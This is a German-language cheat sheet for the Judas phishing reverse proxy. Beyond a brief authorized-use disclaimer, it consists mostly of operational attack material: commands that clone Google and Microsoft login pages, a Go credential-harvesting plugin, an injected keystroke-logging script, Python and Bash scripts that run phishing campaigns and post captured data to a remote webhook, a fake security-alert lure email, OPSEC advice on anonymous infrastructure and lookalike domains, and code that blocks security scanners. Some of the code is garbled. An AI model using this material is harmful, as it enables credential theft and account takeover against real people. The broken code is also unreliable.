Judas Phishing Proxy Cheat Blatt
Überblick
Judas ist eine steckbare Phishing-Proxy entwickelt von joncooperworks, die sich auf Echtzeit-Website Klonen durch umgekehrte Proxy-Funktionalität spezialisiert. Im Gegensatz zu statischen Phishing-Seiten erzeugt Judas dynamische Klone, die das Verhalten der Ziel-Website widerspiegeln, einschließlich JavaScript-Ausführung, Formulareinreichungen und Sitzungsmanagement. Dies macht es besonders effektiv, moderne Sicherheitsmaßnahmen zu umgehen und überzeugende Phishing-Kampagnen zu schaffen.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Verwendung gegen jedes Ziel haben.
Installation
Voraussetzungen
```bash
Install Go 1.16+ and Git
sudo apt update sudo apt install -y golang-go git build-essential
Verify Go installation
go version
Set Go environment variables
export GOPATH=$HOME/go export PATH=$PATH:$GOPATH/bin export GO111MODULE=on ```_
Installation von GitHub
```bash
Clone Judas repository
git clone https://github.com/joncooperworks/judas.git cd judas
Build Judas
go build -o judas cmd/judas/main.go
Install to system path
sudo mv judas /usr/local/bin/
Verify installation
judas --help ```_
Go Module Installation
```bash
Install directly using go install
go install github.com/joncooperworks/judas/cmd/judas@latest
Verify installation
judas --help ```_
Docker Installation
```bash
Clone repository
git clone https://github.com/joncooperworks/judas.git cd judas
Build Docker image
docker build -t judas .
Run Judas container
docker run -it --rm -p 8080:8080 judas --target https://example.com --address 0.0.0.0:8080
Run with SSL certificates
docker run -it --rm -p 443:443 -v $(pwd)/certs:/certs judas \ --target https://example.com \ --address 0.0.0.0:443 \ --ssl-cert /certs/cert.pem \ --ssl-key /certs/key.pem ```_
Handbuch Bau
```bash
Download source code
wget https://github.com/joncooperworks/judas/archive/main.zip unzip main.zip cd judas-main
Install dependencies
go mod download
Build binary
go build -ldflags="-s -w" -o judas cmd/judas/main.go
Set permissions
chmod +x judas ```_
Basisnutzung
Einfache Website Cloning
```bash
Clone a website on localhost
judas --target https://example.com --address localhost:8080
Clone with custom listening address
judas --target https://login.microsoftonline.com --address 0.0.0.0:8080
Clone with SSL termination
judas --target https://accounts.google.com \ --address 0.0.0.0:443 \ --ssl-cert cert.pem \ --ssl-key key.pem
Clone with custom user agent
judas --target https://facebook.com \ --address localhost:8080 \ --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" ```_
Erweiterte Konfiguration
```bash
Clone with custom headers
judas --target https://example.com \ --address localhost:8080 \ --header "X-Forwarded-For: 192.168.1.100" \ --header "X-Real-IP: 192.168.1.100"
Clone with proxy support
judas --target https://example.com \ --address localhost:8080 \ --proxy http://proxy.example.com:8080
Clone with custom timeout
judas --target https://example.com \ --address localhost:8080 \ --timeout 30s
Clone with verbose logging
judas --target https://example.com \ --address localhost:8080 \ --verbose ```_
SSL/TLS Konfiguration
```bash
Generate self-signed certificates
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes \ -subj "/C=US/ST=State/L=City/O=Organization/CN=phishing.example.com"
Use Let's Encrypt certificates
certbot certonly --standalone -d phishing.example.com judas --target https://example.com \ --address 0.0.0.0:443 \ --ssl-cert /etc/letsencrypt/live/phishing.example.com/fullchain.pem \ --ssl-key /etc/letsencrypt/live/phishing.example.com/privkey.pem
Use custom CA certificates
judas --target https://example.com \ --address localhost:8080 \ --ca-cert custom-ca.pem ```_
Plugin-Entwicklung
Basic Plugin Struktur
```go // plugins/logger/logger.go package main
import ( "fmt" "log" "net/http" "time"
"github.com/joncooperworks/judas/pkg/judas"
)
// LoggerPlugin logs all requests and responses type LoggerPlugin struct \\{ logFile string \\}
// NewLoggerPlugin creates a new logger plugin func NewLoggerPlugin(logFile string) *LoggerPlugin \\{ return &LoggerPlugin;\\{ logFile: logFile, \\} \\}
// ProcessRequest processes incoming requests func (p LoggerPlugin) ProcessRequest(req http.Request) error \\{ log.Printf("[REQUEST] %s %s from %s", req.Method, req.URL.Path, req.RemoteAddr)
// Log form data
if req.Method == "POST" \\\\{
req.ParseForm()
for key, values := range req.PostForm \\\\{
for _, value := range values \\\\{
log.Printf("[FORM] %s: %s", key, value)
\\\\}
\\\\}
\\\\}
return nil
\\}
// ProcessResponse processes outgoing responses func (p LoggerPlugin) ProcessResponse(resp http.Response) error \\{ log.Printf("[RESPONSE] %d %s", resp.StatusCode, resp.Status) return nil \\}
// Name returns the plugin name func (p *LoggerPlugin) Name() string \\{ return "Logger" \\}
// Initialize sets up the plugin func (p *LoggerPlugin) Initialize() error \\{ log.Printf("Logger plugin initialized with log file: %s", p.logFile) return nil \\}
// Cleanup performs plugin cleanup func (p *LoggerPlugin) Cleanup() error \\{ log.Printf("Logger plugin cleanup completed") return nil \\}
// Plugin interface implementation var Plugin LoggerPlugin ```_
Credential Harvesting Plugin
```go // plugins/harvester/harvester.go package main
import ( "encoding/json" "fmt" "io/ioutil" "log" "net/http" "os" "time"
"github.com/joncooperworks/judas/pkg/judas"
)
// Credential represents captured credentials
type Credential struct \\{
Timestamp time.Time json:"timestamp"
IP string json:"ip"
UserAgent string json:"user_agent"
URL string json:"url"
Method string json:"method"
FormData map[string]string json:"form_data"
Headers map[string]string json:"headers"
Cookies map[string]string json:"cookies"
\\}
// HarvesterPlugin captures and stores credentials type HarvesterPlugin struct \\{ outputFile string webhookURL string credentials []Credential \\}
// NewHarvesterPlugin creates a new harvester plugin func NewHarvesterPlugin(outputFile, webhookURL string) *HarvesterPlugin \\{ return &HarvesterPlugin;\\{ outputFile: outputFile, webhookURL: webhookURL, credentials: make([]Credential, 0), \\} \\}
// ProcessRequest captures credentials from requests func (p HarvesterPlugin) ProcessRequest(req http.Request) error \\{ // Only process POST requests with form data if req.Method != "POST" \\{ return nil \\}
// Parse form data
err := req.ParseForm()
if err != nil \\\\{
return err
\\\\}
// Check if this looks like a login form
if p.isLoginForm(req.PostForm) \\\\{
credential := Credential\\\\{
Timestamp: time.Now(),
IP: p.getClientIP(req),
UserAgent: req.UserAgent(),
URL: req.URL.String(),
Method: req.Method,
FormData: make(map[string]string),
Headers: make(map[string]string),
Cookies: make(map[string]string),
\\\\}
// Capture form data
for key, values := range req.PostForm \\\\{
if len(values) > 0 \\\\{
credential.FormData[key] = values[0]
\\\\}
\\\\}
// Capture relevant headers
for key, values := range req.Header \\\\{
if len(values) > 0 && p.isRelevantHeader(key) \\\\{
credential.Headers[key] = values[0]
\\\\}
\\\\}
// Capture cookies
for _, cookie := range req.Cookies() \\\\{
credential.Cookies[cookie.Name] = cookie.Value
\\\\}
// Store credential
p.credentials = append(p.credentials, credential)
// Log capture
log.Printf("[HARVEST] Captured credentials from %s", credential.IP)
// Save to file
p.saveCredential(credential)
// Send webhook notification
if p.webhookURL != "" \\\\{
go p.sendWebhook(credential)
\\\\}
\\\\}
return nil
\\}
// isLoginForm checks if the form contains login-like fields func (p *HarvesterPlugin) isLoginForm(form map[string][]string) bool \\{ loginFields := []string\\{ "username", "email", "user", "login", "account", "password", "pass", "pwd", "passwd", \\}
for field := range form \\\\{
for _, loginField := range loginFields \\\\{
| if field == loginField | | | fmt.Sprintf("%s", field) == loginField \\{ return true \\} \\} \\}
return false
\\}
// getClientIP extracts the real client IP func (p HarvesterPlugin) getClientIP(req http.Request) string \\{ // Check X-Forwarded-For header if xff := req.Header.Get("X-Forwarded-For"); xff != "" \\{ return xff \\}
// Check X-Real-IP header
if xri := req.Header.Get("X-Real-IP"); xri != "" \\\\{
return xri
\\\\}
// Fall back to RemoteAddr
return req.RemoteAddr
\\}
// isRelevantHeader checks if a header is relevant for logging func (p *HarvesterPlugin) isRelevantHeader(header string) bool \\{ relevantHeaders := []string\\{ "User-Agent", "Accept", "Accept-Language", "Accept-Encoding", "Referer", "Origin", "X-Forwarded-For", "X-Real-IP", \\}
for _, relevant := range relevantHeaders \\\\{
if header == relevant \\\\{
return true
\\\\}
\\\\}
return false
\\}
// saveCredential saves credential to file func (p *HarvesterPlugin) saveCredential(credential Credential) \\{ | file, err := os.OpenFile(p.outputFile, os.O_APPEND | os.O_CREATE | os.O_WRONLY, 0644) | if err != nil \\{ log.Printf("Error opening output file: %v", err) return \\} defer file.Close()
// Write as JSON
data, err := json.Marshal(credential)
if err != nil \\\\{
log.Printf("Error marshaling credential: %v", err)
return
\\\\}
file.Write(data)
file.WriteString("\n")
\\}
// sendWebhook sends credential data to webhook func (p *HarvesterPlugin) sendWebhook(credential Credential) \\{ // Implementation for webhook notification // This would send the credential data to a remote endpoint log.Printf("Sending webhook notification for credential from %s", credential.IP) \\}
// ProcessResponse processes responses (not used for harvesting) func (p HarvesterPlugin) ProcessResponse(resp http.Response) error \\{ return nil \\}
// Name returns the plugin name func (p *HarvesterPlugin) Name() string \\{ return "Harvester" \\}
// Initialize sets up the plugin func (p *HarvesterPlugin) Initialize() error \\{ log.Printf("Harvester plugin initialized with output file: %s", p.outputFile) return nil \\}
// Cleanup performs plugin cleanup func (p *HarvesterPlugin) Cleanup() error \\{ log.Printf("Harvester plugin captured %d credentials", len(p.credentials)) return nil \\}
// Plugin interface implementation var Plugin HarvesterPlugin ```_
Inhaltsänderung Plugins
```go // plugins/modifier/modifier.go package main
import ( "bytes" "io/ioutil" "log" "net/http" "regexp" "strings"
"github.com/joncooperworks/judas/pkg/judas"
)
// ModifierPlugin modifies response content type ModifierPlugin struct \\{ replacements map[string]string injections []string \\}
// NewModifierPlugin creates a new modifier plugin func NewModifierPlugin() *ModifierPlugin \\{ return &ModifierPlugin;\\{ replacements: make(map[string]string), injections: make([]string, 0), \\} \\}
// AddReplacement adds a content replacement rule func (p *ModifierPlugin) AddReplacement(search, replace string) \\{ p.replacements[search] = replace \\}
// AddInjection adds content to inject func (p *ModifierPlugin) AddInjection(content string) \\{ p.injections = append(p.injections, content) \\}
// ProcessRequest processes requests (not used for modification) func (p ModifierPlugin) ProcessRequest(req http.Request) error \\{ return nil \\}
// ProcessResponse modifies response content func (p ModifierPlugin) ProcessResponse(resp http.Response) error \\{ // Only modify HTML content contentType := resp.Header.Get("Content-Type") if !strings.Contains(contentType, "text/html") \\{ return nil \\}
// Read response body
body, err := ioutil.ReadAll(resp.Body)
if err != nil \\\\{
return err
\\\\}
resp.Body.Close()
// Convert to string for modification
content := string(body)
// Apply replacements
for search, replace := range p.replacements \\\\{
content = strings.ReplaceAll(content, search, replace)
\\\\}
// Inject additional content
for _, injection := range p.injections \\\\{
// Inject before closing body tag
content = strings.ReplaceAll(content, "</body>", injection+"</body>")
\\\\}
// Add keylogger script
keyloggerScript := `
<script>
document.addEventListener('keydown', function(e) \\{
fetch('/log-keystroke', \\{
method: 'POST',
headers: \\{'Content-Type': 'application/json'\\},
body: JSON.stringify(\\{
key: e.key,
timestamp: Date.now(),
| target: e.target.name | | e.target.id | \}) \}).catch(() => \{\}); \}); ` content = strings.ReplaceAll(content, "", keyloggerScript+"")
// Update response body
resp.Body = ioutil.NopCloser(bytes.NewReader([]byte(content)))
resp.ContentLength = int64(len(content))
resp.Header.Set("Content-Length", fmt.Sprintf("%d", len(content)))
log.Printf("[MODIFY] Modified response content (%d bytes)", len(content))
return nil
\\}
// Name returns the plugin name func (p *ModifierPlugin) Name() string \\{ return "Modifier" \\}
// Initialize sets up the plugin func (p *ModifierPlugin) Initialize() error \\{ // Add default replacements p.AddReplacement("Sign In", "Sign In (Secure)") p.AddReplacement("Login", "Login (Verified)")
// Add tracking pixel
trackingPixel := `<img src="/track.gif" width="1" height="1" style="display:none;">`
p.AddInjection(trackingPixel)
log.Printf("Modifier plugin initialized with %d replacements and %d injections",
len(p.replacements), len(p.injections))
return nil
\\}
// Cleanup performs plugin cleanup func (p *ModifierPlugin) Cleanup() error \\{ log.Printf("Modifier plugin cleanup completed") return nil \\}
// Plugin interface implementation var Plugin ModifierPlugin ```_
Konfiguration und Bereitstellung
Datei konfigurieren
```yaml
judas.yaml
target: "https://accounts.google.com" address: "0.0.0.0:443" ssl_cert: "/etc/ssl/certs/cert.pem" ssl_key: "/etc/ssl/private/key.pem"
Proxy settings
proxy: "http://proxy.example.com:8080" timeout: "30s" user_agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
Headers to add
headers: - "X-Forwarded-For: 192.168.1.100" - "X-Real-IP: 192.168.1.100"
Plugins
plugins: - name: "logger" config: log_file: "/var/log/judas/access.log" - name: "harvester" config: output_file: "/var/log/judas/credentials.json" webhook_url: "https://your-server.com/webhook" - name: "modifier" config: replacements: "Sign In": "Sign In (Secure)" "Login": "Login (Verified)"
Logging
log_level: "info" log_file: "/var/log/judas/judas.log"
Security
rate_limit: 100 max_connections: 1000 ```_
Systemierter Service
```ini
/etc/systemd/system/judas.service
[Unit] Description=Judas Phishing Proxy After=network.target
[Service] Type=simple User=judas Group=judas WorkingDirectory=/opt/judas ExecStart=/usr/local/bin/judas --config /etc/judas/judas.yaml Restart=always RestartSec=5
Security settings
NoNewPrivileges=true PrivateTmp=true ProtectSystem=strict ProtectHome=true ReadWritePaths=/var/log/judas
[Install] WantedBy=multi-user.target ```_
Docker komponiert
```yaml
docker-compose.yml
version: '3.8'
services: judas: build: . ports: - "443:443" - "80:80" volumes: - ./certs:/certs:ro - ./logs:/logs - ./config:/config:ro environment: - JUDAS_TARGET=https://accounts.google.com - JUDAS_ADDRESS=0.0.0.0:443 - JUDAS_SSL_CERT=/certs/cert.pem - JUDAS_SSL_KEY=/certs/key.pem command: > judas --target $\\{JUDAS_TARGET\\} --address $\\{JUDAS_ADDRESS\\} --ssl-cert $\\{JUDAS_SSL_CERT\\} --ssl-key $\\{JUDAS_SSL_KEY\\} --config /config/judas.yaml restart: unless-stopped
nginx: image: nginx:alpine ports: - "8080:80" volumes: - ./nginx.conf:/etc/nginx/nginx.conf:ro depends_on: - judas restart: unless-stopped ```_
Nginx Reverse Proxy
```nginx
nginx.conf
events \\{ worker_connections 1024; \\}
http \\{ upstream judas \\{ server judas:443; \\}
server \\\\{
listen 80;
server_name phishing.example.com;
location / \\\\{
proxy_pass https://judas;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
# SSL settings
proxy_ssl_verify off;
proxy_ssl_session_reuse on;
\\\\}
# Logging
access_log /var/log/nginx/judas_access.log;
error_log /var/log/nginx/judas_error.log;
\\\\}
\\} ```_
Automatisierung und Schrift
Python Automation Script
```python
!/usr/bin/env python3
Judas automation script
import subprocess import time import json import os import requests import threading from datetime import datetime
class JudasAutomation: def init(self, target_url, listen_address="0.0.0.0:8080"): self.target_url = target_url self.listen_address = listen_address self.process = None self.monitoring = False self.webhook_url = "https://your-webhook-url.com/notify" self.log_file = "judas.log" self.credentials_file = "credentials.json"
def start_judas(self, ssl_cert=None, ssl_key=None):
"""Start Judas proxy"""
cmd = [
"judas",
"--target", self.target_url,
"--address", self.listen_address,
"--verbose"
]
if ssl_cert and ssl_key:
cmd.extend(["--ssl-cert", ssl_cert, "--ssl-key", ssl_key])
try:
self.process = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True
)
print(f"[+] Judas started with PID: \\\\{self.process.pid\\\\}")
print(f"[+] Target: \\\\{self.target_url\\\\}")
print(f"[+] Listening on: \\\\{self.listen_address\\\\}")
return True
except Exception as e:
print(f"[-] Failed to start Judas: \\\\{e\\\\}")
return False
def monitor_logs(self):
"""Monitor Judas logs for activity"""
self.monitoring = True
print("[+] Starting log monitoring...")
while self.monitoring:
try:
if self.process and self.process.poll() is None:
# Read stdout
line = self.process.stdout.readline()
if line:
self.process_log_line(line.strip())
time.sleep(0.1)
except Exception as e:
print(f"[-] Log monitoring error: \\\\{e\\\\}")
time.sleep(5)
def process_log_line(self, line):
"""Process individual log line"""
try:
# Log to file
with open(self.log_file, 'a') as f:
f.write(f"\\\\{datetime.now().isoformat()\\\\} - \\\\{line\\\\}\n")
# Check for credential capture
if "POST" in line and any(field in line.lower() for field in ["password", "username", "email"]):
print(f"[+] Potential credential capture: \\\\{line\\\\}")
self.send_notification(\\\\{
'type': 'credential_capture',
'log_line': line,
'timestamp': datetime.now().isoformat()
\\\\})
# Check for new connections
if "new connection" in line.lower():
print(f"[+] New victim connection: \\\\{line\\\\}")
self.send_notification(\\\\{
'type': 'new_connection',
'log_line': line,
'timestamp': datetime.now().isoformat()
\\\\})
except Exception as e:
print(f"[-] Error processing log line: \\\\{e\\\\}")
def send_notification(self, data):
"""Send webhook notification"""
try:
payload = \\\\{
'text': f"🎣 Judas Activity: \\\\{data['type']\\\\}",
'data': data
\\\\}
response = requests.post(
self.webhook_url,
json=payload,
timeout=10
)
if response.status_code == 200:
print("[+] Notification sent successfully")
else:
print(f"[-] Notification failed: \\\\{response.status_code\\\\}")
except Exception as e:
print(f"[-] Notification error: \\\\{e\\\\}")
def setup_ssl_certificates(self, domain):
"""Setup SSL certificates for domain"""
try:
# Generate self-signed certificate
cmd = [
"openssl", "req", "-x509", "-newkey", "rsa:4096",
"-keyout", "key.pem", "-out", "cert.pem",
"-days", "365", "-nodes",
"-subj", f"/C=US/ST=State/L=City/O=Organization/CN=\\\\{domain\\\\}"
]
result = subprocess.run(cmd, capture_output=True, text=True)
if result.returncode == 0:
print(f"[+] SSL certificates generated for \\\\{domain\\\\}")
return "cert.pem", "key.pem"
else:
print(f"[-] Failed to generate SSL certificates: \\\\{result.stderr\\\\}")
return None, None
except Exception as e:
print(f"[-] SSL certificate generation error: \\\\{e\\\\}")
return None, None
def setup_ngrok_tunnel(self):
"""Setup ngrok tunnel for public access"""
try:
port = self.listen_address.split(':')[1]
# Start ngrok tunnel
ngrok_process = subprocess.Popen([
"ngrok", "http", port
], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
time.sleep(5)
# Get public URL
response = requests.get("http://localhost:4040/api/tunnels")
if response.status_code == 200:
tunnels = response.json()['tunnels']
if tunnels:
public_url = tunnels[0]['public_url']
print(f"[+] Public URL: \\\\{public_url\\\\}")
return public_url, ngrok_process
except Exception as e:
print(f"[-] Failed to setup ngrok tunnel: \\\\{e\\\\}")
return None, None
def analyze_traffic(self):
"""Analyze captured traffic"""
try:
if not os.path.exists(self.log_file):
print("[-] No log file found")
return
with open(self.log_file, 'r') as f:
lines = f.readlines()
# Basic analysis
total_requests = len([line for line in lines if "HTTP" in line])
post_requests = len([line for line in lines if "POST" in line])
unique_ips = len(set([
line.split()[2] for line in lines
if len(line.split()) > 2 and "." in line.split()[2]
]))
# Generate report
report = \\\\{
'total_requests': total_requests,
'post_requests': post_requests,
'unique_ips': unique_ips,
'analysis_timestamp': datetime.now().isoformat()
\\\\}
# Save report
with open('traffic_analysis.json', 'w') as f:
json.dump(report, f, indent=2)
print(f"[+] Traffic analysis complete:")
print(f" Total requests: \\\\{total_requests\\\\}")
print(f" POST requests: \\\\{post_requests\\\\}")
print(f" Unique IPs: \\\\{unique_ips\\\\}")
print(f"[+] Report saved to: traffic_analysis.json")
except Exception as e:
print(f"[-] Traffic analysis error: \\\\{e\\\\}")
def run_campaign(self, duration_hours=1, use_ssl=False, domain=None):
"""Run complete phishing campaign"""
print("[+] Starting Judas phishing campaign...")
ssl_cert, ssl_key = None, None
# Setup SSL if requested
if use_ssl and domain:
ssl_cert, ssl_key = self.setup_ssl_certificates(domain)
if ssl_cert and ssl_key:
# Update listen address for HTTPS
self.listen_address = self.listen_address.replace(':8080', ':443')
# Setup ngrok tunnel
public_url, ngrok_process = self.setup_ngrok_tunnel()
# Start Judas
if not self.start_judas(ssl_cert, ssl_key):
return False
# Start monitoring in background thread
monitor_thread = threading.Thread(target=self.monitor_logs)
monitor_thread.daemon = True
monitor_thread.start()
# Send start notification
self.send_notification(\\\\{
'type': 'campaign_start',
'target': self.target_url,
'public_url': public_url,
'duration_hours': duration_hours
\\\\})
# Run for specified duration
print(f"[+] Campaign running for \\\\{duration_hours\\\\} hour(s)...")
time.sleep(duration_hours * 3600)
# Stop monitoring
self.monitoring = False
# Analyze traffic
self.analyze_traffic()
# Send completion notification
self.send_notification(\\\\{
'type': 'campaign_complete',
'target': self.target_url
\\\\})
# Cleanup
self.cleanup(ngrok_process)
print("[+] Campaign completed successfully")
return True
def cleanup(self, ngrok_process=None):
"""Cleanup processes and files"""
try:
if self.process and self.process.poll() is None:
self.process.terminate()
self.process.wait(timeout=10)
print("[+] Judas process terminated")
if ngrok_process and ngrok_process.poll() is None:
ngrok_process.terminate()
print("[+] Ngrok tunnel stopped")
# Final backup
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
if os.path.exists(self.log_file):
final_backup = f"judas_log_\\\\{timestamp\\\\}.txt"
os.rename(self.log_file, final_backup)
print(f"[+] Final log backup: \\\\{final_backup\\\\}")
except Exception as e:
print(f"[-] Cleanup error: \\\\{e\\\\}")
Usage example
def main(): # Configuration target_url = "https://accounts.google.com" listen_address = "0.0.0.0:8080" duration_hours = 1 use_ssl = True domain = "accounts-google-security.com"
# Create automation instance
automation = JudasAutomation(target_url, listen_address)
automation.webhook_url = "https://your-webhook-url.com/notify"
# Run campaign
success = automation.run_campaign(duration_hours, use_ssl, domain)
if success:
print("[+] Campaign completed successfully")
else:
print("[-] Campaign failed")
if name == "main": main() ```_
Bash Automation Script
```bash
!/bin/bash
Judas bash automation script
TARGET_URL="https://accounts.google.com" LISTEN_ADDRESS="0.0.0.0:8080" DURATION="3600" # 1 hour USE_SSL="true" DOMAIN="accounts-google-security.com"
Function to start Judas
start_judas() \\{ echo "[+] Starting Judas proxy..."
local cmd="judas --target $TARGET_URL --address $LISTEN_ADDRESS --verbose"
if [ "$USE_SSL" = "true" ]; then
# Generate SSL certificates
generate_ssl_certificates
cmd="$cmd --ssl-cert cert.pem --ssl-key key.pem"
fi
# Start Judas in background
$cmd > judas.log 2>&1 &
JUDAS_PID=$!
sleep 5
if kill -0 "$JUDAS_PID" 2>/dev/null; then
echo "[+] Judas started successfully (PID: $JUDAS_PID)"
return 0
else
echo "[-] Failed to start Judas"
return 1
fi
\\}
Function to generate SSL certificates
generate_ssl_certificates() \\{ echo "[+] Generating SSL certificates for $DOMAIN..."
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes \
-subj "/C=US/ST=State/L=City/O=Organization/CN=$DOMAIN" 2>/dev/null
if [ $? -eq 0 ]; then
echo "[+] SSL certificates generated successfully"
else
echo "[-] Failed to generate SSL certificates"
fi
\\}
Function to setup ngrok tunnel
setup_ngrok() \\{ echo "[+] Setting up ngrok tunnel..."
local port=$(echo "$LISTEN_ADDRESS"|cut -d':' -f2)
ngrok http "$port" > /dev/null 2>&1 &
NGROK_PID=$!
sleep 5
# Get public URL
PUBLIC_URL=$(curl -s http://localhost:4040/api/tunnels|jq -r '.tunnels[0].public_url')
if [ "$PUBLIC_URL" != "null" ] && [ -n "$PUBLIC_URL" ]; then
echo "[+] Public URL: $PUBLIC_URL"
echo "$PUBLIC_URL" > ngrok_url.txt
return 0
else
echo "[-] Failed to get ngrok URL"
return 1
fi
\\}
Function to monitor logs
monitor_logs() \\{ echo "[+] Starting log monitoring..."
tail -f judas.log|while read line; do
echo "[LOG] $line"
# Check for credential capture
| if echo "$line" | grep -qi "POST.password\ | POST.username\ | POST.*email"; then | echo "[+] Potential credential capture detected" send_notification "credential_capture" "$line" fi
# Check for new connections
if echo "$line"|grep -qi "new connection"; then
echo "[+] New victim connection"
send_notification "new_connection" "$line"
fi
done &
MONITOR_PID=$!
\\}
Function to send notifications
send_notification() \\{ local type="$1" local data="$2" local webhook_url="https://your-webhook-url.com/notify"
if command -v curl &> /dev/null; then
curl -X POST -H "Content-Type: application/json" \
-d "\\\\{\"text\":\"🎣 Judas Activity: $type\", \"data\":\"$data\"\\\\}" \
"$webhook_url" 2>/dev/null
fi
\\}
Function to analyze traffic
analyze_traffic() \\{ echo "[+] Analyzing captured traffic..."
if [ ! -f "judas.log" ]; then
echo "[-] No log file found"
return
fi
local total_requests=$(grep -c "HTTP" judas.log)
local post_requests=$(grep -c "POST" judas.log)
| local unique_ips=$(grep -oP '\d+.\d+.\d+.\d+' judas.log | sort -u | wc -l) |
echo "[+] Traffic analysis results:"
echo " Total requests: $total_requests"
echo " POST requests: $post_requests"
echo " Unique IPs: $unique_ips"
# Save analysis to file
cat > traffic_analysis.txt << EOF
Traffic Analysis Report Generated: $(date) Target: $TARGET_URL Duration: $DURATION seconds
Total requests: $total_requests POST requests: $post_requests Unique IPs: $unique_ips EOF
echo "[+] Analysis saved to: traffic_analysis.txt"
\\}
Function to cleanup
cleanup() \\{ echo "[+] Cleaning up..."
if [ -n "$JUDAS_PID" ]; then
kill "$JUDAS_PID" 2>/dev/null
echo "[+] Judas stopped"
fi
if [ -n "$NGROK_PID" ]; then
kill "$NGROK_PID" 2>/dev/null
echo "[+] Ngrok tunnel stopped"
fi
if [ -n "$MONITOR_PID" ]; then
kill "$MONITOR_PID" 2>/dev/null
echo "[+] Log monitoring stopped"
fi
# Final backup
if [ -f "judas.log" ]; then
local timestamp=$(date +"%Y%m%d_%H%M%S")
cp judas.log "judas_log_$timestamp.txt"
echo "[+] Final log backup: judas_log_$timestamp.txt"
fi
exit 0
\\}
Set trap for cleanup
trap cleanup SIGINT SIGTERM
Main execution
main() \\{ echo "[+] Judas Automation Script" echo "[+] Target: $TARGET_URL" echo "[+] Listen Address: $LISTEN_ADDRESS" echo "[+] Duration: $DURATION seconds" echo "[+] SSL: $USE_SSL"
# Check dependencies
for cmd in judas openssl curl jq; do
if ! command -v "$cmd" &> /dev/null; then
echo "[-] Required command not found: $cmd"
exit 1
fi
done
# Setup ngrok tunnel
if setup_ngrok; then
# Start Judas
if start_judas; then
# Start log monitoring
monitor_logs
# Send start notification
send_notification "campaign_start" "Target: $TARGET_URL, Duration: $DURATION seconds"
# Run for specified duration
echo "[+] Campaign running for $DURATION seconds..."
sleep "$DURATION"
# Analyze traffic
analyze_traffic
# Send completion notification
send_notification "campaign_complete" "Target: $TARGET_URL"
fi
fi
cleanup
\\}
Execute main function
main ```_
Integration mit anderen Tools
GoPhys Integration
```python
Integrate Judas with GoPhish for email delivery
import requests import json
class GoPhishJudasIntegration: def init(self, gophish_url, gophish_api_key, judas_url): self.gophish_url = gophish_url self.gophish_api_key = gophish_api_key self.judas_url = judas_url self.headers = \\{ 'Authorization': f'Bearer \\{gophish_api_key\\}', 'Content-Type': 'application/json' \\}
def create_gophish_campaign(self):
"""Create GoPhish campaign with Judas URL"""
campaign_data = \\\\{
"name": "Judas Proxy Campaign",
"template": \\\\{
"name": "Account Security Alert",
"subject": "Immediate Action Required: Verify Your Account",
"html": f"""
<html>
<body>
<h2>Security Alert</h2>
<p>We've detected unusual activity on your account that requires immediate attention.</p>
<p>Please verify your identity to secure your account:</p>
<p><a href="\\\\{self.judas_url\\\\}" style="background-color: #1a73e8; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px;">Verify Account Now</a></p>
<p>This verification link will expire in 24 hours.</p>
<p>If you did not request this verification, please contact support immediately.</p>
</body>
</html>
""",
"text": f"Please verify your account by visiting: \\\\{self.judas_url\\\\}"
\\\\},
"page": \\\\{
"name": "Judas Redirect",
"html": f'<script>window.location.href="\\\\{self.judas_url\\\\}";</script>',
"redirect_url": self.judas_url
\\\\}
\\\\}
response = requests.post(
f"\\\\{self.gophish_url\\\\}/api/campaigns",
headers=self.headers,
json=campaign_data
)
return response.json()
Usage
integration = GoPhishJudasIntegration( "http://localhost:3333", "your_gophish_api_key", "https://your-judas-proxy.com" )
campaign = integration.create_gophish_campaign() ```_
Metasploit Integration
```bash
Use Judas for credential harvesting, then pivot to Metasploit
After capturing credentials through Judas, use them in Metasploit
Example: Use captured credentials for further exploitation
use auxiliary/scanner/http/http_login set RHOSTS target-server.com set USERNAME captured_username set PASSWORD captured_password run
Use captured session cookies
use auxiliary/scanner/http/cookie_replay set COOKIE "captured_session_cookie" set RHOSTS target.com run ```_
EvilGinx2 Integration
```bash
Combine Judas with EvilGinx2 for advanced phishing
Use Judas for initial website cloning
Use EvilGinx2 for 2FA bypass and session management
Start Judas for website cloning
judas --target https://accounts.google.com --address localhost:8080
Configure EvilGinx2 to use Judas as upstream
This allows combining real-time cloning with 2FA bypass
```_
Operationelle Sicherheit
Sicherheit der Infrastruktur
```bash
Use VPS with anonymous payment
Setup through Tor/VPN
Use legitimate domain names
Implement proper SSL certificates
Example secure deployment
1. Purchase VPS with cryptocurrency
2. Access through Tor browser
3. Register domain with privacy protection
4. Setup Let's Encrypt SSL
5. Configure proper logging and monitoring
```_
Domain und SSL Setup
```bash
Register legitimate-looking domain
Example: accounts-google-verification.com
Setup Let's Encrypt SSL
certbot certonly --standalone -d your-domain.com
Use with Judas
judas --target https://accounts.google.com \ --address 0.0.0.0:443 \ --ssl-cert /etc/letsencrypt/live/your-domain.com/fullchain.pem \ --ssl-key /etc/letsencrypt/live/your-domain.com/privkey.pem ```_
Verkehrsobfukation
```bash
Use CDN services (CloudFlare, AWS CloudFront)
Implement realistic timing delays
Use common ports (80, 443)
Mimic legitimate traffic patterns
Example CloudFlare setup
1. Add domain to CloudFlare
2. Configure DNS records
3. Enable proxy (orange cloud)
4. Configure security settings
5. Point to Judas proxy
```_
Anti-Detektionsmaßnahmen
```go // Implement anti-detection in Judas plugins func (p AntiDetectionPlugin) ProcessRequest(req http.Request) error \\{ userAgent := req.UserAgent()
// Block security tools
securityTools := []string\\\\{
"curl", "wget", "python-requests", "scanner",
"bot", "crawler", "security", "research",
\\\\}
for _, tool := range securityTools \\\\{
if strings.Contains(strings.ToLower(userAgent), tool) \\\\{
return errors.New("blocked security tool")
\\\\}
\\\\}
